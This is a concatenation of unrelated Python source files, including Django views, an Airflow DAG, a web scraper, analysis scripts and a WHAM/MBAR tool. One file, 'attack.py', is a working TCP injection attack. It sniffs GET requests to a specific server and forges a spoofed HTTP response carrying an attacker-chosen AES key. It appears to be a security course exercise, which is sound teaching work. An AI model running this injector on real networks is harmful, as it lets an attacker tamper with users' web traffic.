ERROR: Request '{}': {}\".format(request.get_full_path(), str(error)))\r\n return JsonResponse(error.to_json(), status=404)\r\n\r\n merch_json = merch.get_json()\r\n if merch.response_status == 'error':\r\n return JsonResponse(merch_json, status=404)\r\n\r\n # end timer and log successful response\r\n end_time = time.time()\r\n ms_elapsed = (end_time - start_time)*1000\r\n\r\n result = parse_merchandise(merch_json,request, start_date, end_date, ms_elapsed)\r\n logger.info(\"HTTP 200 OK: Request '{}' successfully returned. Time taken: {}ms\".format(request.get_full_path(), ms_elapsed))\r\n\r\n return JsonResponse(result)\r\n\r\n\r\n@cross_origin\r\ndef show_retail_data(request, categories, states='AUS'):\r\n \"\"\"\r\n get the request, return retail data\r\n :param request: contain date\r\n :param categories: Categories string\r\n :param states: str, List of states\r\n :return: JSON of retail data\r\n \"\"\"\r\n\r\n # begin timer and log request\r\n start_time = time.time()\r\n logger.info(\"New API request: {}\".format(request.get_full_path()))\r\n\r\n start_date = request.GET.get('startDate')\r\n end_date = request.GET.get('endDate')\r\n\r\n # string to list\r\n categories_list = categories.split(',')\r\n states_list = states.split(',')\r\n\r\n # init a Retail Object\r\n # get the JSON file with the get_data method or something like that\r\n try:\r\n retail = Retail(categories_list, states_list, start_date, end_date)\r\n except (LookupNotFoundError, InvalidDateError) as error:\r\n logger.info(\"HTTP 404 ERROR: Request '{}': {}\".format(request.get_full_path(), str(error)))\r\n return JsonResponse(error.to_json(), status=404)\r\n\r\n retail_json = retail.get_json()\r\n if retail.response_status == 'error':\r\n return JsonResponse(retail_json, status=404)\r\n\r\n\r\n # end timer and log successful response\r\n end_time = time.time()\r\n ms_elapsed = (end_time - start_time)*1000\r\n\r\n result = parse_retail(retail_json,request, start_date, end_date, ms_elapsed)\r\n\r\n logger.info(\"HTTP 200 OK: Request '{}' successfully returned. Time taken: {}ms\".format(request.get_full_path(), ms_elapsed))\r\n\r\n return JsonResponse(result)\r\n","sub_path":"apiv3/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"511065731","text":"import json\nfrom google.cloud import bigquery\nfrom google.oauth2 import service_account\nfrom google.cloud import bigquery_storage\nfrom utils.helperutils import HelperUtils\n\nclass BiqQueryHelper:\n def __inti__(self, table_id = None, job_config = None):\n utils = HelperUtils()\n bigquery_config = utils.get_bigquery_config()\n bigquery_key = utils.get_bigquery_key()\n\n if bigquery_key != None:\n bigquery_credentials = json.loads(bigquery_key)\n self.credentials = service_account.Credentials.from_service_account_info(\n bigquery_credentials)\n self.client = bigquery.Client(\n credentials=self.credentials, project=bigquery_config['project_id'])\n self.storage_client = bigquery_storage.BigQueryReadClient(\n credentials=self.credentials)\n else:\n raise Exception('Environment variable `BIGQUERY_KEY` is not set.')\n\n self.table_id = table_id\n self.job_config = job_config\n\n def load_table(self, dataframe):\n self.job = self.client.load_table_from_dataframe(\n dataframe, self.table_id, job_config=self.job_config)\n self.job.result()\n \n def get_table(self):\n if (self.job != None and self.job.done()):\n return self.client.get_table(self.table_id)\n else:\n return None\n\n def get_dataframe_from_query(self, query):\n return self.client.query(query).result().to_dataframe(self.storage_client)\n\n def close_bigquery_client(self):\n self.client.close()","sub_path":"src/bigquery_helper.py","file_name":"bigquery_helper.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"540861841","text":"# -*- coding: utf-8 -*-\nimport subprocess\nfrom airflow import DAG\nfrom airflow.exceptions import AirflowException # signal ERROR\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.sensors import BaseSensorOperator\nfrom datetime import datetime, timedelta\n\nclass ReportsRawReadySensor(BaseSensorOperator):\n def poke(self, context):\n retcode = subprocess.call(['sudo', '--non-interactive', '/usr/local/bin/docker-trampoline', 'reports_raw_sensor',\n context['ds'], context['execution_date'].isoformat(), (context['execution_date'] + context['dag'].schedule_interval).isoformat()])\n if retcode == 42:\n return True\n elif retcode == 13:\n return False\n else:\n raise AirflowException('Unexpected `is-reports-raw-ready` exit code: {:d}'.format(retcode))\n\ndag = DAG(\n dag_id='hist_canning',\n schedule_interval=timedelta(days=1),\n start_date=datetime(2012, 12, 5),\n #end_date=datetime(2017, 7, 7), # NB: end_date is included\n default_args={\n 'email': 'leonid@openobservatory.org', # prometheus/alertmanager sends to team@ but airflow is more chatty\n 'retries': 1,\n })\n\n# NB: removing an Operator from DAG leaves some trash in the database tracking\n# old state of that operator, but it seems to trigger no issues with 1.8.0\n\nReportsRawReadySensor(task_id='reports_raw_sensor', poke_interval=5*60, timeout=12*3600, dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='canning', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='tar_reports_raw', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='reports_tgz_s3_sync', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='reports_tgz_s3_ls', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='reports_tgz_cleanup', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='canned_s3_sync', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='canned_s3_ls', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='canned_cleanup', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='autoclaving', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='meta_pg', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='reports_raw_cleanup', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='sanitised_s3_ls', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='sanitised_check', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='sanitised_cleanup', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='autoclaved_tarlz4_s3_sync', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='autoclaved_jsonl_s3_sync', bash_command='shovel_jump.sh', dag=dag)\n\ndag.set_dependency('reports_raw_sensor', 'canning')\n\ndag.set_dependency('reports_raw_sensor', 'tar_reports_raw')\ndag.set_dependency('canning', 'tar_reports_raw')\n\ndag.set_dependency('tar_reports_raw', 'reports_tgz_s3_sync')\n\ndag.set_dependency('reports_tgz_s3_sync', 'reports_tgz_s3_ls')\n\n# reports_raw_cleanup -> reports_tgz_cleanup is NOT a dependency as reports_raw_cleanup uses only index file\ndag.set_dependency('reports_tgz_s3_sync', 'reports_tgz_cleanup') # can't cleanup unless synced\ndag.set_dependency('reports_tgz_s3_ls', 'reports_tgz_cleanup') # data dependency\n\ndag.set_dependency('canning', 'canned_s3_sync')\n\ndag.set_dependency('canned_s3_sync', 'canned_s3_ls')\n\n# reports_raw_cleanup -> canned_cleanup is NOT a dependency as reports_raw_cleanup uses only index file\ndag.set_dependency('autoclaving', 'canned_cleanup') # uses `canned` data\ndag.set_dependency('tar_reports_raw', 'canned_cleanup') # may use `canned` data\ndag.set_dependency('canned_s3_sync', 'canned_cleanup') # can't cleanup unless synced\ndag.set_dependency('canned_s3_ls', 'canned_cleanup') # data dependency\n\ndag.set_dependency('canning', 'autoclaving')\n\ndag.set_dependency('autoclaving', 'meta_pg')\n\n# reports_raw_cleanup is done when both tasks are finished and have same data\n# reports_raw_cleanup does not remove unknown files as a safeguard\ndag.set_dependency('canning', 'reports_raw_cleanup')\ndag.set_dependency('tar_reports_raw', 'reports_raw_cleanup')\n\ndag.set_dependency('autoclaving', 'sanitised_check')\n\ndag.set_dependency('autoclaving', 'autoclaved_tarlz4_s3_sync')\n\ndag.set_dependency('autoclaving', 'autoclaved_jsonl_s3_sync')\n\ndag.set_dependency('autoclaving', 'sanitised_cleanup')\ndag.set_dependency('sanitised_s3_ls', 'sanitised_cleanup')\ndag.set_dependency('sanitised_check', 'sanitised_cleanup')\n","sub_path":"ansible/roles/airflow/files/airflow-dags/canning.py","file_name":"canning.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"23235774","text":"#--------------------------------\r\n#EXERCICE 2\r\n#LEONIDAS PASTRAS\r\n#P20155\r\n#18-2-2021\r\n#--------------------------------\r\nimport random\r\n\r\nn = int(input(\"Enter a number (anything over 30 might or might not crash your computer): \"))\r\ni = 1\r\nnum = [0, 1]\r\np = num[1]\r\ndef Fibonacci(i, p):\r\n if i < n:\r\n i = i + 1\r\n tempNum = num[1]\r\n num[1] = num[1] + num[0]\r\n num[0] = tempNum\r\n Fibonacci(i, p)\r\n else:\r\n CheckIfPrime(num[1])\r\ndef CheckIfPrime(p):\r\n isPrime = True\r\n j = 0\r\n while isPrime and j < 20:\r\n a = random.randint(0, 1000000) #1 million\r\n isPrime = (a ** p) % p == (a % p)\r\n UnnecessaryMessage(a, isPrime)\r\n j = j + 1\r\n if isPrime:\r\n print(\"The term\", n, \"of the Fibonacci sequence is\", p, \"and it is a Prime number! :D\")\r\n else:\r\n print(\"The term\", n, \"of the Fibonacci sequence is\", p, \"and it is NOT a Prime number! :(\")\r\ndef UnnecessaryMessage(a, isPrime):\r\n if isPrime:\r\n print(\"The random number\", a, \"does satisfy the equation\")\r\n else:\r\n print(\"The random number\", a, \"does NOT satisfy the equation\")\r\nFibonacci(i, p)","sub_path":"Code/Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"379557029","text":"from datetime import datetime\r\nimport optuna\r\nfrom joblib import dump, load\r\nfrom sklearn.metrics import mean_absolute_error, median_absolute_error, r2_score\r\nfrom SantaClaraPack.Models.PreProcessors import *\r\nfrom SantaClaraPack.Banco.Dados import Dados\r\nfrom SantaClaraPack.Optimizer.Optimizer import Optimizer\r\nfrom SantaClaraPack.Plot.Plot import Plot\r\n\r\nif __name__ == '__main__':\r\n desired_width = 320\r\n pd.set_option('display.width', desired_width)\r\n pd.set_option('display.max_columns', 100)\r\n\r\n # Avaliacao do modelo modelo com hyper-tunning\r\n dao = Dados()\r\n optimize = Optimizer()\r\n pre = PreProcessors()\r\n gridded = GriddedDataProcessor()\r\n window = WindowProcessor()\r\n\r\n study = optuna.create_study(\r\n storage='sqlite:///Optimizer/optimize_tests.db',\r\n direction='maximize',\r\n study_name='optimize',\r\n load_if_exists=True\r\n )\r\n\r\n # Load do modelo\r\n model = load(filename=r'Models/mlp_posto_1.joblib')\r\n\r\n df_resultados = pd.DataFrame()\r\n df_vaz_true = dao.get_vazao(\r\n data_inicial='2013-01-01',\r\n data_final='2017-12-30'\r\n )\r\n\r\n df_vaz_true.drop(columns=['id', 'num_posto'], inplace=True)\r\n df_vaz_true['dat_medicao'] = pd.to_datetime(df_vaz_true['dat_medicao'])\r\n df_vaz_true.set_index(keys=['dat_medicao'], inplace=True)\r\n\r\n df_chuva_true = dao.get_gridded_data(\r\n classe='Chuva',\r\n data_inicial='2013-01-01',\r\n data_final='2017-12-30',\r\n lat_inicial=-22.4,\r\n lat_final=-21.2,\r\n lon_inicial=-44.6,\r\n lon_final=-44.2,\r\n )\r\n\r\n df_chuva_true['dat_medicao'] = pd.to_datetime(df_chuva_true['dat_medicao'])\r\n df_chuva_true = gridded.transform(\r\n df=df_chuva_true,\r\n index='dat_medicao',\r\n cols=['val_lat', 'val_lon'],\r\n value='val_precip',\r\n var_name='chuva',\r\n agg='sum',\r\n )\r\n\r\n #for data in pd.date_range(start='2013-08-17', end='2017-12-30', freq='7D'):\r\n for data in pd.date_range(start='2013-08-17', end='2017-12-01', freq='7D'):\r\n\r\n data_inicial = datetime.strftime(\r\n data + pd.to_timedelta(arg=study.best_params['window_neg'], unit='D'),\r\n '%Y-%m-%d'\r\n )\r\n\r\n data_final_vazao = data + pd.to_timedelta(arg=study.best_params['window_neg'], unit='D') + \\\r\n pd.to_timedelta(arg=-study.best_params['window_neg'], unit='D')\r\n\r\n data_final = datetime.strftime(\r\n data + pd.to_timedelta(arg=10, unit='D'),\r\n '%Y-%m-%d'\r\n )\r\n\r\n df_vazao = df_vaz_true.loc[data_inicial:data_final_vazao]\r\n\r\n df_chuva_transform = df_chuva_true.loc[data_inicial:data_final]\r\n\r\n # Formando X e y\r\n X = pd.concat(objs=[df_vazao[['val_vaz_natr']], df_chuva_transform], sort=True, axis=1)\r\n\r\n i = 1\r\n # Gera previsões para t+1 a t+7 para cada data do loop anterior\r\n for data_previsao in pd.date_range(start=data, freq='1D', periods=10):\r\n\r\n X_test_lag = window.transform_predict(\r\n X=X,\r\n n_in=study.best_params['window_neg'],\r\n n_out=0\r\n )\r\n\r\n X_test_lag = pd.DataFrame(data=[X_test_lag.loc[data_previsao]], columns=X_test_lag.loc[data_previsao].index)\r\n y_hat = model.predict(X=X_test_lag)\r\n\r\n\r\n # Atualiza na base de dados\r\n X.loc[data_previsao, 'val_vaz_natr'] = y_hat\r\n\r\n # Atualiza log de resultados\r\n aux = pd.DataFrame(\r\n data=dict(\r\n dat_reference=data,\r\n dat_previsao=data_previsao,\r\n num_termo=i,\r\n val_vaz_pred=y_hat,\r\n val_vaz_true=df_vaz_true.loc[data_previsao, 'val_vaz_natr']\r\n )\r\n )\r\n\r\n df_resultados = pd.concat(objs=[df_resultados, aux], ignore_index=True)\r\n i += 1\r\n\r\n # Scores\r\n #print('MAE test: {:}'.format(mean_absolute_error(y_true=, y_pred=X_test_lag[1:, 'val_vaz_natr'])))\r\n #print('MedAE test: {:}'.format(median_absolute_error(y_true=y_test_lag, y_pred=y_hat)))\r\n #print('R2 test: {:}'.format(r2_score(y_true=y_test_lag, y_pred=y_hat)))\r\n\r\n\r\n df_resultados.to_csv(path_or_buf=r'Fig/resultados_posto_1.csv', sep=';', decimal=',')\r\n\r\n # plot\r\n #plot = Plot()\r\n #plot.plot_prediction_compararison(y_true=y_test_lag['val_vaz_natr'].values, y_pred=y_hat, times=y_test_lag.index)","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"239952320","text":"# coding=utf-8\n# 3. AFED = Accessibility of flow taking existing destinations\n\ndef AFED(flow_df, row_index): # AFAPF\n \n # rename teh columns so we can call them \n flow_df = flow_df.rename(columns = {flow_df.columns[0]:'origin_ID', \n flow_df.columns[1]:'dest_ID', \n flow_df.columns[2]:'dist', \n flow_df.columns[3]:'weight', \n flow_df.columns[4]:'dest_mass'})\n # define O and D for each row the variables\n D = flow_df['dest_ID'][row_index]\n O = flow_df['origin_ID'][row_index]\n \n # get the list of possible destinations\n all_dest = (flow_df.query('origin_ID == @O')\n .query('weight > 0')\n ['dest_ID']\n .unique()\n ) \n \n # Create all destination flows \n x1 = pd.DataFrame({'D': np.array([D]*len(all_dest), dtype=object), \n 'dests':all_dest}).merge(flow_df, how='left', left_on=['D','dests'], right_on=['origin_ID','dest_ID'])\n \n # merge with the distances and masses \n \n # Delete the flow to origin\n x1 = x1[~x1.dests.isin(list(O))] \n\n # calculate the accessibility\n A = (x1['dist']*x1['dest_mass']).sum()\n\n return A","sub_path":".ipynb_checkpoints/AFED-checkpoint.py","file_name":"AFED-checkpoint.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"649671906","text":"#!/usr/bin/python\n\n# Scrape http://auctions.strettons.co.uk and store the results\n# in a CSV file\n#\n# Syntax: scrape_auctions.py \n# If the first argument is '-', then the output is printed on the screen\n\nimport re\nimport bs4\nimport csv\nimport sys\nimport urllib2\n\n# most of the documents are generated dynamically through document.write()\n# this function extracts the strings out of document.write(), unescapes double quotes\n# and converts non-breaking spaces to normal spaces\ndef decode_document_writes(content):\n content = re.sub('^document.write\\(\"(.*)\"\\);', '\\\\1', content, 0, re.MULTILINE)\n content = re.sub('\\\\\\\\', '', content, 0, re.MULTILINE)\n # replace   with a space\n content = re.sub(u'\\u00a0', ' ', content, 0, re.MULTILINE)\n\n return content\n\n# get the stripped string from a HTML element\ndef get_stripped_string(element):\n string = ''.join([ text for text in element.stripped_strings ])\n\n return string.encode('utf8')\n\n\n\ncsv_file = 'strettons.csv'\ncsv_file = open(csv_file, \"w\")\n\nbase_url = \"http://auctions.strettons.co.uk/CurrentAuction.aspx\"\n\nhomepage = urllib2.urlopen(base_url)\nsoup = bs4.BeautifulSoup(homepage)\n\n# there are multiple scripts that render the auction pages\n# first, main_script is loaded, which in turn loads auction_script\nmain_script_element = soup.find('script')\nmain_script_url = main_script_element.get('src')\nmain_script = urllib2.urlopen(main_script_url)\nmain_script_content = main_script.read().decode('utf8')\n\n# auction_script generates the actual list of actions on the home page\nauction_script_url_matches = re.search(\"http.*auction/[0-9]+/\", main_script_content)\nauction_script_url = auction_script_url_matches.group()\nauction_script = urllib2.urlopen(auction_script_url)\nauction_script_content = auction_script.read().decode('utf8')\nauction_script_content = decode_document_writes(auction_script_content)\n\n# details_script contains all the details of an auction\ndetails_script_url_matches = re.search(\"http.*/lot/\", main_script_content)\ndetails_script_url = details_script_url_matches.group()\n\nsoup = bs4.BeautifulSoup(auction_script_content)\n\n# all the auction information. it is not really required,\n# but can be helpful if the script needs to be extended\nauctions = []\nfor tr in soup.find_all('tr'):\n tds = tr.find_all('td')\n if (len(tds) != 3):\n continue\n\n lot_td, link_td, _ = tds\n\n # lot num is easier to get here\n lot_num = get_stripped_string(lot_td)\n\n # link to the particular auction page\n link_a = link_td.find('a')\n link = link_a.get('href')\n\n # extra parameters that may be pased\n lid = re.sub('.*lid=([0-9]+).*', '\\\\1', link)\n tid = re.sub('.*tid=([^&]*).*', '\\\\1', link)\n\n # logic copied from the javascript\n if tid == link:\n tid = '9'\n\n # last part of the URL\n urlpart = lid + \"/\" + tid\n\n auction = {\n 'lot_num': lot_num,\n 'url': details_script_url + urlpart + '?src=null'\n }\n\n auctions += [ auction ]\n\nwriter = csv.writer(csv_file)\n\n# load the auction page, get the timings and print the result\nfor auction in auctions:\n url = auction['url']\n auction_page = urllib2.urlopen(url)\n auction_content = auction_page.read().decode('utf8')\n auction_content = decode_document_writes(auction_content)\n\n soup = bs4.BeautifulSoup(auction_content)\n lot_address_div = soup.find(class_ = 'lotaddress')\n lot_address = get_stripped_string(lot_address_div)\n\n timing_ps = soup.find_all(class_ = 'red')\n\n timings = []\n for timing_p in timing_ps:\n timings += [ get_stripped_string(timing_p) ]\n\n auction['address'] = lot_address\n auction['timings'] = timings\n\n writer.writerow([ auction['lot_num'], auction['address'] ] + auction['timings'])\n csv_file.flush()\n\n","sub_path":"ScrapeScripts/strettons.py","file_name":"strettons.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"383224736","text":"# Copyright 2015 Cisco Systems, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom nose.tools import *\nfrom ucsmsdk.ucsfilter import generate_infilter\nfrom ucsmsdk.ucsxmlcodec import to_xml_str\n\n\ndef test_001_not_filter():\n\n expected = b''\n\n filter_str = 'not (dn,\"org-root/ls-C1_B1\", type=\"eq\")'\n filter_xml = generate_infilter(class_id=\"LsServer\",\n filter_str=filter_str,\n is_meta_class_id=True)\n\n xml_str = to_xml_str(filter_xml.to_xml())\n\n assert_equal(xml_str, expected)\n","sub_path":"tests/common/test_generate_filter.py","file_name":"test_generate_filter.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"294029695","text":"from flask import jsonify\n\nclass SecurityManager__Utils(object):\n\n def _prepare_create_user_args(self, **kwargs):\n \"\"\"Checking if specified roles exist\"\"\"\n roles = kwargs.get(\"roles\", [])\n for i, role in enumerate(roles):\n rn = role.name if isinstance(role, self.role_model) else role\n roles[i] = self.find_role(rn)\n kwargs[\"roles\"] = roles\n return kwargs\n\n def _json_response(self, status, redirect_addr, desc):\n resp = {}\n resp['status'] = status\n resp['redirect_addr'] = redirect_addr\n resp['desc'] = desc\n return jsonify(resp)\n","sub_path":"flask_security/security_manager__utils.py","file_name":"security_manager__utils.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"484307196","text":"\n\n#calss header\nclass _CIRCUMNAVIGATE():\n\tdef __init__(self,): \n\t\tself.name = \"CIRCUMNAVIGATE\"\n\t\tself.definitions = [u'to sail all the way around something: ', u'to move around something in order to avoid hitting it: ', u'to avoid something by taking a particular course of action: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_circumnavigate.py","file_name":"_circumnavigate.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"76418375","text":"#!/usr/bin/python3\n\nimport scapy\nfrom scapy.all import send, conf, L3RawSocket\n\ndef inject_pkt(pkt):\n #import dnet\n #dnet.ip().send(pkt)\n conf.L3socket=L3RawSocket\n send(pkt)\n\n######\n# edit this function to do your attack\n######\ndef handle_pkt(pkt):\n identifyServer = str(pkt[30])+\".\"+str(pkt[31])+\".\"+str(pkt[32])+\".\"+str(pkt[33])\n if identifyServer == \"18.234.115.5\" and pkt.find(b'GET')!=-1: \n numberSeq = int(pkt[38:42].hex(),16)\n numberAck = int(pkt[42:46].hex(),16)\n portDestination = int(pkt[34:36].hex(),16)\n final_IP = str(pkt[26])+\".\"+str(pkt[27])+\".\"+str(pkt[28])+\".\"+str(pkt[29])\n payloadFinal = 'HTTP/1.1 200 OK\\r\\nServer: nginx/1.14.0 (Ubuntu)\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nContent-Length: 335\\r\\nConnection: close\\r\\n\\r\\n\\n\\n Free AES Key Generator!\\n\\n\\n

Free AES Key Generator!

\\nDefinitely not run by the NSA.
\\n
\\n
\\nYour free AES-256 key: 4d6167696320576f7264733a2053717565616d697368204f7373696672616765
\\n\\n'\n packet = IP(src=\"18.234.115.5\", dst=final_IP)/TCP(sport=80, dport=portDestination, flags=\"PA\", seq = numberAck , ack=numberSeq+1)/payloadFinal\n inject_pkt(packet)\n\ndef main():\n import socket\n s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, 0x0300)\n while True:\n pkt = s.recv(0xffff)\n handle_pkt(pkt)\n\nif __name__ == '__main__':\n main()\n","sub_path":"attack.py","file_name":"attack.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"417834292","text":"from operator import itemgetter\nimport csv\nreader = csv.reader(open(\"part_00000\"), delimiter=\"\\t\")\n\nf = open(\"sorted_data.tsv\", \"w\")\nf.write('%s\\t%s\\n'%(\"text\", \"size\"))\nfor line in sorted(reader, key=lambda row: int(row[1]), reverse=True):\n f.write( '%s\\t%s\\n' %(line[0],line[1]) ) # str() converts to string\nf.close()\n #print '%s\\t%s' %(line[0],line[1])\n","sub_path":"tsv_sort.py","file_name":"tsv_sort.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"453997992","text":"\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot\nimport argparse\nimport logging\nfrom mdtools import dr, get_object\nimport scipy.integrate\n\nfrom scipy.optimize import minimize\nimport pymbar\nimport time\n\nfrom mdtools import ParallelTool\n\nfrom constants import k\n\nfrom whamutils import *\n\nimport matplotlib as mpl\n\nimport matplotlib.pyplot as plt\n\n\nlog = logging.getLogger('mdtools.whamerr')\n\nfrom IPython import embed\n\n\ndef _subsample_small(bias_mat, uncorr_n_samples, uncorr_n_tot, n_samples, n_windows):\n\n # sub sample the bias matrix according to the number of uncorrelated samples from each window\n uncorr_bias_mat = np.zeros((uncorr_n_tot, n_windows), dtype=np.float32)\n start_idx = 0\n uncorr_start_idx = 0\n subsampled_indices = np.array([], dtype=int)\n\n np.random.seed()\n\n for i, this_uncorr_n_sample in enumerate(uncorr_n_samples):\n # the total number of (correlated) datapoints for this window\n this_n_sample = n_samples[i]\n avail_indices = np.arange(this_n_sample)\n # subsampled indices for this data\n this_indices = start_idx + np.random.choice(avail_indices, size=this_uncorr_n_sample, replace=True)\n subsampled_indices = np.append(subsampled_indices, this_indices)\n\n uncorr_bias_mat[uncorr_start_idx:uncorr_start_idx+this_uncorr_n_sample, :] = bias_mat[this_indices, :]\n \n uncorr_start_idx += this_uncorr_n_sample\n start_idx += this_n_sample\n\n\n return (uncorr_bias_mat, subsampled_indices)\n\ndef _subsample(bias_mat, uncorr_n_samples, autocorr_blocks, n_samples):\n\n # sub sample the bias matrix according to the number of uncorrelated samples from each window\n\n n_windows = n_samples.size\n\n ## Number of samples for each window, after selecting n_uncorr_sample of block size for each window\n n_blocked_sample = uncorr_n_samples*autocorr_blocks\n\n # sanity\n assert n_blocked_sample.sum() <= n_samples.sum()\n\n uncorr_bias_mat = np.zeros((n_blocked_sample.sum(), n_windows), dtype=np.float32)\n start_idx = 0\n uncorr_start_idx = 0\n subsampled_indices = np.array([], dtype=int)\n\n np.random.seed()\n\n # number of blocks (of size autocorr_blocks[i]) we'll select from this window\n for i, this_n_blocks in enumerate(uncorr_n_samples):\n \n this_block_size = autocorr_blocks[i]\n # the total number of (correlated) datapoints for this window\n this_n_sample = n_samples[i]\n\n ## Number of blocks times block size for this sample\n this_n_blocked_sample = n_blocked_sample[i]\n assert this_n_blocked_sample == this_n_blocks * this_block_size\n\n ## Possible starting indices for each block - these are local\n avail_indices = np.arange(this_n_sample-this_block_size+1)\n # Global indices of this window we have to choose from\n total_indices = start_idx + np.arange(this_n_sample)\n\n # (local) starting and ending indices for each block\n this_start_indices = np.random.choice(avail_indices, size=this_n_blocks, replace=True)\n this_end_indices = this_start_indices + this_block_size\n\n ## Now make up the indices of this bootstrap subsample\n this_indices = np.array([], dtype=int)\n for this_start, this_end in zip(this_start_indices, this_end_indices):\n this_indices = np.append(this_indices, total_indices[slice(this_start, this_end)])\n\n assert this_indices.min() >= start_idx\n assert this_indices.max() < start_idx + this_n_sample\n\n assert this_indices.size == this_n_blocked_sample\n\n subsampled_indices = np.append(subsampled_indices, this_indices)\n\n uncorr_bias_mat[uncorr_start_idx:uncorr_start_idx+this_n_blocked_sample, :] = bias_mat[this_indices, :]\n \n uncorr_start_idx += this_n_blocked_sample\n start_idx += this_n_sample\n\n\n return (uncorr_bias_mat, subsampled_indices)\n\n\n# Do a batch of bootstrap subsampling\ndef _bootstrap(lb, ub, bias_mat, uncorr_n_samples, autocorr_blocks, n_samples, \n ones_m, ones_n, xweights, all_data, all_data_aux, boot_fn=None):\n \n # Number of bootstrap runs to do this round\n batch_size = ub - lb\n\n n_windows = n_samples.size\n assert n_windows == uncorr_n_samples.size == autocorr_blocks.size\n\n ## Number of samples for each window, after selecting n_uncorr_sample of block size for each window\n n_blocked_sample = uncorr_n_samples*autocorr_blocks\n\n\n # Results for this bootstrap batch\n f_k_ret = np.zeros((batch_size, n_windows), dtype=np.float32)\n boot_fn_ret = np.zeros(batch_size, dtype=object)\n\n # Subsampled indices for each bootstrap in this batch\n all_boot_indices = np.zeros((batch_size, n_blocked_sample.sum()), dtype=int)\n\n for batch_num in range(batch_size):\n\n ## Fill up the uncorrelated bias matrix\n boot_uncorr_bias_mat, boot_indices = _subsample(bias_mat, uncorr_n_samples, autocorr_blocks, n_samples)\n\n myargs = (boot_uncorr_bias_mat, n_blocked_sample/n_blocked_sample.sum(), n_blocked_sample.sum())\n boot_f_k = np.append(0, minimize(eval_fn, xweights, method='BFGS', jac=True, args=myargs).x)\n\n f_k_ret[batch_num,:] = boot_f_k\n all_boot_indices[batch_num,:] = boot_indices\n \n if boot_fn is not None:\n boot_logweights = gen_data_logweights(boot_uncorr_bias_mat, boot_f_k, n_samples, ones_m, ones_n[boot_indices])\n boot_fn_ret[batch_num] = boot_fn(all_data, all_data_aux, boot_indices, boot_logweights)\n del boot_logweights\n\n del boot_uncorr_bias_mat\n\n return (f_k_ret, boot_fn_ret, all_boot_indices, lb, ub)\n\n\nclass WHAMmer(ParallelTool):\n prog='WHAM/MBAR analysis'\n description = '''\\\nPerform MBAR/Binless WHAM analysis on 'phiout.dat' or '*.xvg' datasets (e.g. from alchemical FE cals with GROMACS).\nNote that XVG type datasets must contain DeltaU for *every* other window (not just the adjacent window(s), as\n is required by 'g_bar', which uses TI, not MBAR).\n\nAlso perform bootstrapping standard error analysis - must specify an autocorrelation time for this to work correctly!\n\nThis tool supports 